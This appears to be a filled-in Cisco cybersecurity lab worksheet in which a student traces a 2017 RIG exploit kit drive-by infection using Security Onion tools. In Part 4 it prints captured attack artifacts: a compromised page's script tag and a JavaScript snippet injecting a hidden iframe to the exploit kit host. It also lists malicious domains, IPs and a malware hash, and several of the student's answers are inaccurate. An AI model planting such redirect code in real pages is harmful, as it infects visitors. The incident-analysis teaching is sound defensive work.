Lab - Investigating a Malware Exploit

Objectives
In this lab you will:
Part 1: Use Kibana to Learn About a Malware Exploit
Part 2: Investigate the Exploit with Sguil
Part 3: Use Wireshark to Investigate an Attack
Part 4: Examine Exploit Artifacts
This lab is based on an exercise from the website malware-traffic-analysis.net which is an excellent resource
for learning how to analyze network and host attacks. Thanks to [email protected] for
permission to use materials from his site.

Background / Scenario
You have decided to interview for a job in a medium sized company as a Tier 1 cybersecurity analyst. You
have been asked to demonstrate your ability to pinpoint the details of an attack in which a computer was
compromised. Your goal is to answer a series of questions using Sguil, Kibana, and Wireshark in Security
Onion.
You have been given the following details about the event:
 The event happened in January of 2017.
 It was discovered by the Snort NIDS.

Required Resources
 Security Onion virtual machine
 Internet access

Instructions

Part 1: Use Kibana to Learn About a Malware Exploit

In Part 1, use Kibana to answer the following questions. To help you get started, you are informed that the
attack took place at some time during January 2017. You will need to pinpoint the exact time.

Step 1: Narrow the timeframe.

a. Login to Security Onion with the analyst username and cyberops password.
b. Open Kibana (username analyst and password cyberops) and set an Absolute time range to narrow the
focus to log data from January 2017.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

c. You will see a graph appear with a single entry showing. To view more details, you need to narrow the
amount of time that is displayed. Narrow the time range in the Total Log Count Over Time visualization by
clicking and dragging to select an area around the graph data point. You may need to repeat this process
until you see some detail in the graph.

Note: Use the <Esc> key to close any dialog boxes that may be interfering with your work.

Step 2: Locate the Event in Kibana

a. After narrowing the time range in the main Kibana dashboard, go to the NIDS Alert Data dashboard by
clicking NIDS.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

b. Zoom in on the event by clicking and dragging in the NIDS – Alerts Over Time visualization further focus
in on the event timeframe. Since the event happened over a very short period of time, select just the
graph plot line. Zoom in until your display resembles the one below.

c. Insert a screenshot of the result.

d. Click the first point on the timeline to filter for only that first event.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

e. Now view details for the events that occurred at that time. Scroll all the way to the bottom of the
dashboard until you see the NIDS Alerts section of the page. The alerts are arranged by time. Expand
the first event in the list by clicking the pointer arrow that is to the left of the timestamp.

f. Look at the expanded alert details.

g. Insert a screenshot of the result.

h. Answer the following questions:

Questions:

What is the time of the first detected NIDS alert in Kibana?

22:54:43.000

What is the source IP address in the alert?

172.16.4.193

What is the destination IP address in the alert?

194.87.234.129

What is the destination port in the alert? What service is this?

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

80 HTTP

What is the classification of the alert?

Trojan-activity

What is the destination geo country name?

Russia

i. In a web browser on a computer that can connect to the internet, go to the link that is provided in the
signature_info field of the alert. This will take you to the Emerging Threats Snort alert rule for the exploit.
There are a series of rules shown. This is because signatures can change over time, or new and more
accurate rules are developed. The newest rule is at the top of the page. Examine details of the rule.
Questions:

What is the malware family for this event?

Exploit_Kit_RIG

What is the severity of the exploit?

Major

What is an Exploit Kit? (EK) Search on the internet to answer this question.

Exploit kits were developed as a way to automatically and silently

exploit vulnerabilities on a victims machine while browsing the
web.

Exploit kits frequently use what is called a drive-by attack to begin the attack campaign. In a drive-by
attack, a user will visit a website that should be considered safe. However, threat actors find ways to
compromise legitimate websites by finding vulnerabilities on the webservers that host them. The
vulnerabilities allow threat actors to insert their own malicious code into the HTML of a webpage. The
code is frequently inserted into an iFrame. iFrames permit content from different websites to be displayed
in the same webpage. Threat actors will frequently create an invisible iFrame that connects the browser to
a malicious website. The HTML from the website that is loaded into the browser often contains a
JavaScript that will send the browser to yet another malicious website or download malware until the
computer.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Step 3: View the Transcript capME!

a. Click the alert _id value, you can pivot to CapME to inspect the transcript of the event.

In the CapME! window you can see the transcript from the session. It shows the transactions between the
source computer, in blue, and the destinations that are accessed by the source. A lot of valuable
information, including a link to the pcap file that is related to this alert, is available in the transcript.

Examine the first block of blue text. This is the request from the source to the destination webserver. Note
that two URLs are listed in this block. The first is tagged as SRC: REFERER. This is the website that the
source computer first accessed. However, the server referred browser the HTTP GET request to the
SRC:HOST. Something in the HTML sent the source to this site. It looks like this could be a drive-by
attack!
Questions:

What website did the user intend to connect to?

Homeimprovement.com

What URL did the browser refer the user to?

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Tyu.benme.com

What kind of content is requested by the source host from tybenme.com? Why could this be a
problem? Look in the DST server block of the transcript too.

Usernames and passwords used by someone on the host

computer which could lead to other accounts being compromised.

b. Insert a screenshot of the result.

c. Close the CapME! browser tab.

a. From the top of the NIDS Alert Dashboard click the HTTP entry located under Zeek Hunting heading.
d. In the HTTP dashboard, verify that your absolute time range includes 2017-01-27 22:54:30.000 to 2017-
01-27 22:56:00.000.
e. Scroll down to the HTTP - Sites section of the dashboard.
Question:

What are some of the websites that are listed?

Homeimprovement.com, tyu.benme.com, bing.com, google-

analytics.com, api.blockcypher.com

We should know some of these websites from the transcript that we read earlier. Not all of the sites that
are shown are part of the exploit campaign. Research the URLs by searching for them on the internet. Do
not connect to them. Place the URLs in quotes when you do your searches.
Questions:

Which of these sites is likely part of the exploit campaign?

Tyu.benme.com, api.blockcypher.com

What are the HTTP - MIME Types listed in the Tag Cloud?

Image/x-icon, application/x-shockwave-flash, text/html, text/plain,

image/gif, application/javascript, text/json

Part 2: Investigate the Exploit with Sguil

In Part 2, you will use Sguil to check the IDS alerts and gather more information about the series of events
related to this attack.
Note: The alert IDs used in this lab are for example only. The alert IDs on your VM may be different.

Step 4: Open Sguil and locate the alerts.

a. Launch Sguil from the desktop. Login with username analyst and password cyberops. Enable all
sensors and click Start.
b. Locate the group of alerts from January 27th 2017.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Question:

According to Sguil, what are the timestamps for the first and last of the alerts that occurred within
about a second of each other?

22:54:42 22:55:28

c. Insert a screenshot of the result.

Step 1: Investigate the alerts in Sguil.

d. Click the Show Packet Data and Show Rule checkboxes to see the packet header field information and
the IDS signature rule related to the alert.
a. Select the alert ID 5.2 (Event message ET CURRENT Evil Redirector Leading to EK Jul 12 2016).
Question:

According to the IDS signature rule which malware family triggered this alert? You may need to
scroll through the alert signature to find this entry.

PsuedoDarkLeech

e. Maximize the Sguil window and size the Event Message column so that you can see the text of the entire
message.
f. Insert a screenshot of the result.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

g. Look at the Event Messages for each of the alert IDs related to this attack.
Questions:

According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack?

Evil Redirector

Beyond labelling the attack as trojan activity, what other information is provided regarding the
type and name of the malware involved?

Ransomware

By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did
the attack take place?

The user on the host PC visited a website who’s API was taken
over and they had malware installed on their PC.

Step 5: View Transcripts of Events

a. Right-click the associated alert ID 5.2 (Event Message ET CURRENT_EVENTS Evil Redirector Leading
to EK Jul 12 2016). Select Transcript from the menu as shown in the figure.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Question:

What are the referer and host websites that are involved in the first SRC event? What do you think
the user did to generate this alert?

Bing.com and homeimprovement.com, they went to

homeimprovement.com which is the compromised website.

b. Right-click the alert ID 5.24 (source IP address of 139.59.160.143 and Event Message ET
CURRENT_EVENTS Evil Redirector Leading to EK March 15 2017) and choose Transcript to open a
transcript of the conversation.

c. Insert a screenshot of the result.

d. Refer to the transcript and answer the following questions:

Questions:

What kind of request was involved?

Application/javascript

Were any files requested?

no

What is the URL for the referrer and the host website?

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Homeimprovement.com/remodeling-your-kitchen-cabinets.html,
retrotip.visionurbana.com.ve

How the content encoded?

gzip

e. Close the current transcript window. In the Sguil window, right-click the alert ID 5.25 (Event Message ET
CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) and open the transcript. According to the
information in the transcript answer the following questions:
Questions:

How many requests and responses were involved in this alert?

What was the first request?

Text/html

Who was the referrer?

Homeimprovement.com

Who was the host server request to?

Tyu.benme.com

Was the response encoded?

yes

What was the second request?

Text/html

Who was the host server request to?

Tyu.benme.com

Was the response encoded?

yes

What was the third request?

*/*

Who was the referrer?

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Tyu.benme.com

What was the Content-Type of the third response?

Application/x-shockwave-flash

What were the first 3 characters of the data in the response? The data starts after the last DST:
entry.

CWS

CWS is a file signature. File signatures help identify the type of file that is represented different types of
data. Go to the following website https://en.wikipedia.org/wiki/List_of_file_signatures. Use Ctrl-F to open a
find box. Search for this file signature to find out what type of file was downloaded in the data.
Question:

What type of file was downloaded? What application uses this type of file?

flash

f. Close the transcript window.

g. Right-click the same ID again and choose Network Miner. Click the Files tab.
Question:

How many files are there and what is the file types?
There is three files and two of them are html files and the third one is a swf file. your answers here.

Part 3: Use Wireshark to Investigate an Attack

In Part 3, you will pivot to Wireshark to closely examine the details of the attack.

Step 6: Pivot to Wireshark and Change Settings.

a. In Sguil, right-click the alert ID 5.2 (Event Message ET CURRENT_EVENTS Evil Redirector Leading to
EK Jul 12 2016) and pivot to select Wireshark from the menu. The pcap that is associated with this alert
will open in Wireshark.
b. The default Wireshark setting uses a relative time per-packet which is not very helpful for isolating the
exact time an event occurred. To fix this, select to View > Time Display Format > Date and Time of Day
and then repeat a second time, View > Time Display Format > Seconds. Now your Wireshark Time
column has the date and timestamps. Resize the columns to make the display clearer if necessary.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 12 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Step 7: Investigate HTTP Traffic.

a. In Wireshark, use the http.request display filter to filter for web requests only.

b. Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application layer
data.
Question:

What website directed the user to the www.homeimprovement.com website?

Bing.com

c. Insert a screenshot of the result.

Step 8: View HTTP Objects.

a. In Wireshark, choose File > Export Objects > HTTP.
a. Insert a screenshot of the result.

b. In the Export HTTP objects list window, select the remodeling-your-kitchen-cabinets.html packet and save
it to your home folder.
b. Close Wireshark. In Sguil, right-click the alert ID 5.24 (source IP address 139.59.160.143 and Event
Message ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017) and choose
Wireshark to pivot to Wireshark. Apply an http.request display filter and answer the following questions:
Questions:

What is the http request for?

A javascript application file.

What is the host server?

Retrotip.visionurbana.com.ve\r\n

c. In Wireshark, go to File > Export Objects > HTTP and save the JavaScript file to your home folder.
d. Close Wireshark. In Sguil, right-click the alert ID 5.25 (Event Message ET CURRENT_EVENTS RIG EK
URI Struct Mar 13 2017 M2) and choose Wireshark to pivot to Wireshark. Apply an http.request display
filter. Notice that this alert corresponds to the three GET, POST, and GET requests that we looked at
earlier.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 13 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

e. With the first packet selected, in the packet details area, expand the Hypertext Transfer Protocol
application layer data. Right-click the Host information and choose Apply as Column to add the Host
information to the packet list columns, as shown in the figure.

f. To make room for the Host column right-click the Length column header and uncheck it. This will remove
the Length column from the display.
g. The names of the servers are now clearly visible in the Host column of the packet list.

Step 9: Create a Hash for an Exported Malware File.

We know that the user intended to access www.homeimprovement.com, but the site referred the user to other
sites. Eventually files were downloaded to the host from a malware site. In this part of the lab, we will access
the files that were downloaded and submit a file hash to VirusTotal to verify that a malicious file was
downloaded.
a. In Wireshark, go to File > Export Objects > HTTP and save the two text/html files and the application/x-
shockwave-flash file to your home directory.

b. Now that you have saved the three files to your home folder, test to see if one of the files matches a
known hash value for malware at virustotal.com. Issue a ls -l command to look at the files saved in your
home directory. The flash file has the word SeaMonkey near the beginning of the long filename. The
filename begins with %3fbiw=SeaMonkey. Use the ls -l command with grep to filter out the filename with
the pattern seamonkey. The option -i ignores the case distinction.
analyst@SecOnion:~$ ls -l | grep -i seamonkey

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 14 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

-rw-r--r-- 1 analyst analyst 16261 Jun 9 05:50

%3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMonkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYG
OAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-
qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-
qoVzcCgWRxfs&ct=SeaMonkey&tuif=1166

c. Generate a SHA-1 hash for the SeaMonkey flash file with the command sha1sum followed by the
filename. Type the first 4 letters %3fb of the filename and then press the tab key to auto fill the rest of the
filename. Press enter and sha1sum will compute a 40 digit long fixed length hash value.
Highlight the hash value, right-click, and copy it. The sha1sum is highlighted in the example below. Note:
Remember to use tab completion.
analyst@SecOnion:~$ sha1sum
%3fbiw\=SeaMonkey.105qj67.406x7d8b3\&yus\=SeaMonkey.78vg115.406g6d1r6\&br_fl\=
2957\&oq\=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-
qKSErM62V7FjLhTJg\&q\=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-
qoVzcCgWRxfs\&ct\=SeaMonkey\&tuif\=1166
97a8033303692f9b7618056e49a24470525f7290 %3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMo
nkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E
-qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx
fs&ct=SeaMonkey&tuif=1166

c. You can also generate a hash value by using NetworkMiner. Navigate to Sguil and right-click the alert ID
5.25 (Event Message ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) and select
NetworkMinor to pivot to NetworkMinor. Select the Files tab. In this example, right-click the file with swf
extension and select Calculate MD5 / SHA1 / SHA256 hash. Compare the SHA1 hash value with the
one from the previous step. The SHA1 hash values should be the same.
d. Open a web browser and go to virustotal.com. Click the Search tab and enter the hash value to search
for a match in the database of known malware hashes. VirusTotal will return a list of the virus detection
engines that have a rule that matches this hash.

d. Investigate the Detection and Details tabs. Review the information that is provided on this hash value.
What did VirusTotal tell you about this file?

It has 33 engine detections for that file and it uses exploits to

control a system.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 15 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

e. Insert a screenshot of the result.

f. Close the browser and Wireshark. In Sguil, use alert ID 5.37 (Event Message ET CURRENT_EVENTS
RIG EK Landing Sep 12 2016 T2) to pivot to Wireshark and examine the HTTP requests.
Questions:

Are there any similarities to the earlier alerts?

Yes, almost everything is the same.

Are the files similar? Do you see any differences?

The only difference that I really notice is that the earlier alert is
truncated where as the 5.37 alert is not.

g. Create a SHA-1 hash of the SWF file as you did previously.

Question:

Is this the same malware that was downloaded in the previous HTTP session?

yes

h. In Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection.
Questions:

Why do they seem to be post-infection?

They seem like the alerts for the virus actually executing and
taking over the PC

What is interesting about first alert in the last 4 alerts in the series?

The destination port is different from the rest

What type of communication is taking place in the second and third alerts in the series and what
makes it suspicious?

It is querying the DNS

i. Insert a screenshot of the result.

j. Go to virustotal.com and do a URL search for the .top domain used in the attack.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 16 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

Question:

What is the result?

It is a top-level domain (TLD) and it is at the highest level in the

hierarchical domain name system of the internet.

k. Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them
to your home folder.
Question:

What are the filenames if any?

There is one text/html file with the host name of

p27dokhpz2n7nvgr.1jw2lx.top

Part 4: Examine Exploit Artifacts

In this part, you will examine some of the documents that your exported from Wireshark.
l. In Security Onion, open the remodeling-your-kitchen-cabinets.html file using your choice of text editor.
This webpage initiated the attack.
Question:

Can you find the two places in the webpage that are part of the drive-by attack that started the exploit?
Hint: the first is in the <head> area and the second is in the <body> area of the page.
Write your answers here.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Remodeling Your Kitchen Cabinets | Home Improvement</title>

<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

feed=rss2" title="Home Improvement latest posts" />

<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

feed=comments-rss2" title="Home Improvement latest comments" />

<link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" />

<link rel="shortcut icon" href="//www.homeimprovement.com/wp-

content/themes/arras/images/favicon.ico" />

<script type="text/javascript"
src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"></script>
<!-- All in One SEO Pack 2.3.2.3 by Michael Torbert of Semper Fi Web Design[291,330]
-->
<meta name="description" content="Installing cabinets in a remodeled kitchen require
some basic finish carpentry skills. Before starting any installation, it's a good idea
to mark some level and" />

<meta name="keywords" content="cabinets,kitchen,kitchen cabints,knobs,remodel" />

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 17 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

<some output omitted>

a. Insert a screenshot showing the two places. Highlight each one.

b. Open the dle_js.js file in choice of text editor and examine it.
document.write('<div class="" style="position:absolute; width:383px; height:368px;
left:17px; top:-858px;"> <div style="" class=""><a>head</a><a class="head-menu-2">
</a><iframe src="http://tyu.benme.com/?
q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrTUSkrttgWC&biw=Amaya.81lp85.406f4y
5l9&oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29UToBvdeW&yus=Amaya.110oz60.
406a7e5q8&br_fl=4109&tuif=5364&ct=Amaya" width=290 height=257 ></ifr' +'ame> <a
style=""></a></div><a class="" style="">temp</a></div>');
Question:

What does the file do?

It directs visitors to the tyu.benme.com website. your answers here.

How does the code in the javascript file attempt to avoid detection?

It is embedded in the HTML page and it interacts with the

document object model of the page

m. In a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the
filename.
Examine the file and answer the following questions:
Questions:

What kind of file it is?

It is the URL file for tyu.benme.com with instructions on what

browsers it is capable with and how to function.

What are some interesting things about the iframe? Does it call anything?

no

What does the start() function do?

It gets the browsers information

What do you think the purpose of the getBrowser() function is?

It is used to tell the browsers capabilities

Reflection
Exploit Kits are fairly complex exploits that use a variety of methods and resources to carry out an attack.
Interestingly EKs may be used to deliver diverse malware payloads. This is because the EK developer may
offer the exploit kit as a service to other threat actors. Therefore, RIG EK has been associated with a number
of different malware payloads. The following questions may require you investigate the data further using the
tools that were introduced in this lab.

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 18 of 19 www.netacad.com
Lab - Investigating a Malware Exploit

1. The EK used a number of websites. Complete the table below.

URL IP Address Function

search engine links to legitimate

www.bing.com N/A webpage
www.homeimprovement.comblan 104.28.18.74blank Resource page that links to malware.
k
Tyu.benme.comblank 194.87.234.129blank Link to download the malware
Tse1.mm.bing.netblank 204.79.197.200blank It is a whitelisted domain used by
Bing
www.google-analytics.comblank 74.125.141.100blank Lets you measure your advertising
ROI as well as track your Flash,
video and social networking sites and
applications.
Clo.footprintdns.comblank 52.79.148.45blank It is used for tracking users.

Type your answers here.

End of document

 2020 - 2020 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 19 of 19 www.netacad.com